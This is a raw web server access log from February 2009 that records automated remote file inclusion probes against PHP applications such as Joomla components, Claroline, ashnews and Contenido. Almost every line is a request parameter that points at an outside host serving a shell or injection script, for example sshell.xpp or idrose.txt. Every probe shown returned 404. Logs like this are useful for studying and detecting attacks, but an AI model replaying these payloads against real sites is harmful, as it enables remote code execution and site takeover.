89.111.173.113 - - [05/Feb/2009:00:44:11 -0600] "GET /logs/access_log.1219017600//?path%5Bdocroot%5D=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
80.25.82.126 - - [05/Feb/2009:00:45:11 -0600] "GET /logs/access_log.1219449600/includes/stats.inc.php?prefix=http://canalteresina.org/TT?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
212.158.167.98 - - [05/Feb/2009:00:46:08 -0600] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
212.158.167.98 - - [05/Feb/2009:00:46:09 -0600] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
87.101.4.49 - - [05/Feb/2009:00:46:17 -0600] "GET /logs//claroline/inc/claro_init_header.inc.php?includePath=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:46:17 -0600] "GET //claroline/inc/claro_init_header.inc.php?includePath=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:46:17 -0600] "GET /logs/access_log.1206230400//claroline/inc/claro_init_header.inc.php?includePath=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
212.158.167.98 - - [05/Feb/2009:00:46:21 -0600] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
212.158.167.98 - - [05/Feb/2009:00:46:22 -0600] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
87.101.4.49 - - [05/Feb/2009:00:46:25 -0600] "GET /logs/access_log.1206576000//claroline/inc/claro_init_header.inc.php?includePath=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
202.44.52.78 - - [05/Feb/2009:00:46:56 -0600] "GET /logs/access_log.1212278400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 384 "-""libwww-perl/5.65"
85.204.231.202 - - [05/Feb/2009:00:48:17 -0600] "GET /logs/access_log.1212192000//errors.php?error=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:00:49:18 -0600] "GET /logs/access_log.1215043200//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 387 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:00:49:19 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:00:49:19 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:00:49:44 -0600] "GET /logs/access_log.1215907200//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 387 "-""libwww-perl/5.803"
212.158.167.98 - - [05/Feb/2009:00:50:17 -0600] "GET /logs/access_log.1217548800//index.php?_SERVER[DOCUMENT_ROOT]=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
66.71.191.223 - - [05/Feb/2009:00:52:21 -0600] "GET //xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:00:52:21 -0600] "GET //xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:00:52:21 -0600] "GET //modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
85.204.231.202 - - [05/Feb/2009:00:54:38 -0600] "GET //phphtml.php?htmlclass_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
93.85.77.39 - - [05/Feb/2009:00:54:55 -0600] "GET /logs/access_log.1211587200 HTTP/1.1" 200 450946 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
222.231.47.130 - - [05/Feb/2009:00:56:06 -0600] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
65.98.28.210 - - [05/Feb/2009:00:57:16 -0600] "GET /logs/access_log.1212278400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 365 "-""libwww-perl/5.811"
65.98.28.210 - - [05/Feb/2009:00:57:16 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
65.98.28.210 - - [05/Feb/2009:00:57:16 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
65.98.28.210 - - [05/Feb/2009:00:57:21 -0600] "GET /logs/access_log.1216944000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 365 "-""libwww-perl/5.811"
65.98.28.210 - - [05/Feb/2009:00:59:42 -0600] "GET /logs/access_log.1212278400%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iam.skocap.net/Scan2/id.txt???? HTTP/1.1" 404 366 "-""libwww-perl/5.811"
87.249.116.188 - - [05/Feb/2009:01:00:02 -0600] "GET /logs/access_log.1216684800//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
87.249.116.188 - - [05/Feb/2009:01:00:02 -0600] "GET //ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
87.249.116.188 - - [05/Feb/2009:01:00:02 -0600] "GET /logs//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.3.139.15 - - [05/Feb/2009:01:00:39 -0600] "GET /logs/access_log.1216684800//ashnews.php?pathtoashnews=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
72.3.139.15 - - [05/Feb/2009:01:00:39 -0600] "GET //ashnews.php?pathtoashnews=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
72.3.139.15 - - [05/Feb/2009:01:00:39 -0600] "GET /logs//ashnews.php?pathtoashnews=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
72.3.139.15 - - [05/Feb/2009:01:01:34 -0600] "GET /logs/access_log.1215907200//ashnews.php?pathtoashnews=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
209.172.33.230 - - [05/Feb/2009:01:01:50 -0600] "GET //poll/poll_ssi.php?include_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:01:01:50 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:01:01:50 -0600] "GET /logs/access_log.1218067200//poll/poll_ssi.php?include_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.812"
91.186.27.166 - - [05/Feb/2009:01:01:50 -0600] "GET //ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.186.27.166 - - [05/Feb/2009:01:01:50 -0600] "GET /logs//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.186.27.166 - - [05/Feb/2009:01:01:50 -0600] "GET /logs/access_log.1216684800//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
87.249.116.188 - - [05/Feb/2009:01:01:51 -0600] "GET /logs/access_log.1215907200//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.126.131.239 - - [05/Feb/2009:01:01:52 -0600] "GET /logs/access_log.1216684800//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.9"
209.126.131.239 - - [05/Feb/2009:01:01:52 -0600] "GET /logs//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.9"
209.126.131.239 - - [05/Feb/2009:01:01:52 -0600] "GET //ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.9"
85.204.231.202 - - [05/Feb/2009:01:02:07 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
209.172.33.230 - - [05/Feb/2009:01:02:11 -0600] "GET /logs/access_log.1218412800//poll/poll_ssi.php?include_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.812"
77.232.84.2 - - [05/Feb/2009:01:02:38 -0600] "GET /logs/access_log.1216684800//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.84.2 - - [05/Feb/2009:01:02:38 -0600] "GET //ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.84.2 - - [05/Feb/2009:01:02:38 -0600] "GET /logs//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
91.186.27.166 - - [05/Feb/2009:01:03:14 -0600] "GET /logs/access_log.1215907200//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
209.126.131.239 - - [05/Feb/2009:01:03:27 -0600] "GET /logs/access_log.1215907200//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.9"
72.3.139.15 - - [05/Feb/2009:01:05:51 -0600] "GET /logs/access_log.1214092800//ashnews.php?pathtoashnews=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
72.3.139.15 - - [05/Feb/2009:01:07:25 -0600] "GET /logs/access_log.1216080000//ashnews.php?pathtoashnews=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
209.126.131.239 - - [05/Feb/2009:01:08:27 -0600] "GET /logs/access_log.1216080000//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.9"
209.126.131.239 - - [05/Feb/2009:01:09:23 -0600] "GET /logs/access_log.1214092800//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.9"
77.232.84.2 - - [05/Feb/2009:01:09:52 -0600] "GET /logs/access_log.1215907200//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
209.126.131.239 - - [05/Feb/2009:01:10:05 -0600] "GET /logs/access_log.1219536000//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.9"
77.232.84.2 - - [05/Feb/2009:01:10:30 -0600] "GET /logs/access_log.1216080000//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
77.232.84.2 - - [05/Feb/2009:01:10:49 -0600] "GET /logs/access_log.1219536000//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
61.63.18.78 - - [05/Feb/2009:01:12:42 -0600] "GET /logs//config/config_admin.php?INC=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
61.63.18.78 - - [05/Feb/2009:01:12:43 -0600] "GET //config/config_admin.php?INC=http://www.yazd.agri-jahad.ir/news-img/chart.gif??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
66.71.191.223 - - [05/Feb/2009:01:12:59 -0600] "GET /logs/access_log.1219449600//xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:12:59 -0600] "GET /logs/access_log.1219449600//xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:12:59 -0600] "GET //xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:12:59 -0600] "GET //xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:12:59 -0600] "GET /logs//xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:13:00 -0600] "GET /logs//xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
91.186.27.166 - - [05/Feb/2009:01:13:05 -0600] "GET /logs/access_log.1216857600//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.186.27.166 - - [05/Feb/2009:01:13:30 -0600] "GET /logs/access_log.1216080000//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.186.27.166 - - [05/Feb/2009:01:13:37 -0600] "GET /logs/access_log.1219536000//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.3.139.15 - - [05/Feb/2009:01:14:10 -0600] "GET /logs/access_log.1219536000//ashnews.php?pathtoashnews=http://www.ural-teplo.ru/tux/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
89.108.82.20 - - [05/Feb/2009:01:14:15 -0600] "GET /logs//config/config_admin.php?INC=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
89.108.82.20 - - [05/Feb/2009:01:14:16 -0600] "GET //config/config_admin.php?INC=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
89.108.82.20 - - [05/Feb/2009:01:14:18 -0600] "GET /logs//config/config_admin.php?INC=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
89.108.82.20 - - [05/Feb/2009:01:14:18 -0600] "GET //config/config_admin.php?INC=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
66.71.191.223 - - [05/Feb/2009:01:14:36 -0600] "GET /logs/access_log.1219449600//modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:14:36 -0600] "GET //modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:14:37 -0600] "GET /logs//modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
148.245.102.115 - - [05/Feb/2009:01:15:17 -0600] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:01:15:17 -0600] "GET //akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:01:15:17 -0600] "GET /logs/access_log.1216684800%20//akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:01:15:23 -0600] "GET /logs/access_log.1217203200%20//akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
89.248.110.224 - - [05/Feb/2009:01:16:24 -0600] "GET //akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
89.248.110.224 - - [05/Feb/2009:01:16:24 -0600] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 305 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
89.248.110.224 - - [05/Feb/2009:01:16:24 -0600] "GET /logs/access_log.1211500800//akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
87.249.116.188 - - [05/Feb/2009:01:17:30 -0600] "GET /logs/access_log.1216080000//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
87.249.116.188 - - [05/Feb/2009:01:17:30 -0600] "GET /logs/access_log.1219536000//ashnews.php?pathtoashnews=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
148.245.102.115 - - [05/Feb/2009:01:17:40 -0600] "GET /logs/access_log.1211500800//akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.248.110.224 - - [05/Feb/2009:01:18:21 -0600] "GET /logs/access_log.1216684800//akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
148.245.102.115 - - [05/Feb/2009:01:19:58 -0600] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 305 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
148.245.102.115 - - [05/Feb/2009:01:19:58 -0600] "GET /logs/access_log.1211500800//akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
148.245.102.115 - - [05/Feb/2009:01:19:58 -0600] "GET //akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
202.44.52.78 - - [05/Feb/2009:01:20:45 -0600] "GET //poll/poll_ssi.php?include_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:01:20:45 -0600] "GET /logs/access_log.1218067200//poll/poll_ssi.php?include_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:01:20:48 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:01:22:08 -0600] "GET /logs/access_log.1218412800//poll/poll_ssi.php?include_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
89.248.110.224 - - [05/Feb/2009:01:22:09 -0600] "GET /logs/access_log.1216944000//akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
8.4.9.191 - - [05/Feb/2009:01:23:29 -0600] "GET /logs/access_log.1219536000/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautifulchurch.org/images/main/main.js???? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
8.4.9.191 - - [05/Feb/2009:01:23:29 -0600] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautifulchurch.org/images/main/main.js???? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
8.4.9.191 - - [05/Feb/2009:01:23:29 -0600] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautifulchurch.org/images/main/main.js???? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
148.245.102.115 - - [05/Feb/2009:01:24:35 -0600] "GET /logs/access_log.1216944000//akocomments.php?mosConfig_absolute_path=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
87.101.4.49 - - [05/Feb/2009:01:27:35 -0600] "GET /logs/access_log.1216944000//include/write.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 329 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
87.101.4.49 - - [05/Feb/2009:01:27:35 -0600] "GET //include/write.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 302 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.71.191.223 - - [05/Feb/2009:01:27:42 -0600] "GET /logs/access_log.1214956800//xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:27:42 -0600] "GET /logs/access_log.1214956800//modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
66.71.191.223 - - [05/Feb/2009:01:27:42 -0600] "GET /logs/access_log.1214956800//xfsection/modify.php?dir_module=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:01:28:50 -0600] "GET /logs/access_log.1216944000//include/write.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:01:28:50 -0600] "GET //include/write.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:01:28:50 -0600] "GET /logs//include/write.php?dir=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
195.5.163.212 - - [05/Feb/2009:01:29:14 -0600] "GET //frame.php?framefile=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
192.134.106.1 - - [05/Feb/2009:01:30:14 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
